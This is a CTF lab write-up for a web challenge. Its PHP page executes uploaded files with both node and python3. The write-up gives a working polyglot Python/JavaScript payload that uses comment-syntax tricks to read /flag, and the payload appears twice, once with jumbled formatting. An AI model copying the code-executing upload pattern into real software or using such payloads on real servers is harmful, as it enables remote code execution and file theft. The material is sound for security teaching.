Simple Welcome - 0x04(Lab - Script)

tags: CTF Web eductf

Challenge: https://pyscript.ctf.zoolab.org/

Source Code

1 2 3 4 5 6 7 8 9 10 11

<?php if(!isset($_FILES["file"])) highlight_file(__file__) && die(); $flag = file_get_contents('/flag'); $node = @`node {$_FILES["file"]["tmp_name"]} 2>&1`; $python = @`python3 {$_FILES["file"]["tmp_name"]} 2>&1`; if($flag === $node && $flag === $python) echo 'Here is your Flag: '.$flag; else echo 'Fail :('; ?>

Analysis

Must write a script that can be executed in python and node language simultaneously.

Exploit - Using comment

1. In python The comment is # for single line and ''' for multi lines
2. In node The comment is // for single line and /**/ for multi lines
3. Using different definition of comment to write script Some tips:

   1 2	a = 1 // 1; b = ''''''

   Both of these instruction are valid in python

4. Whole payload
   • Python

     1 2 3 4 5 6 7 8 9

     a = 1 // 1 ; b = ''' console.log('Javascript code here'); /* ''' print('Python code here') # */

     1	* Javascript ```javascript a = 1 // 1 ; b = '''

   console.log(‘Javascript code here’);

   /* ‘’’

   print(‘Python code here’)

   # */ ```

• Whole exploit

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  a = 1 // 1 ; b = ''' const fs = require('fs'); fs.readFile("/flag", 'utf8',(error, data) => { if (error) { console.error(error); return; } console.log(data.split('\n')[0]); }) /* ''' f = open("/flag", "r") print(f.read().split('\n')[0]) # */

Reference

• 【已解决】PHP中函数前面加上at符号@的作用
• [shell 2>&1是甚麼意思]
• How to open a local file with JavaScript?
• How to Read/Write local files with Node.js
• String.prototype.split()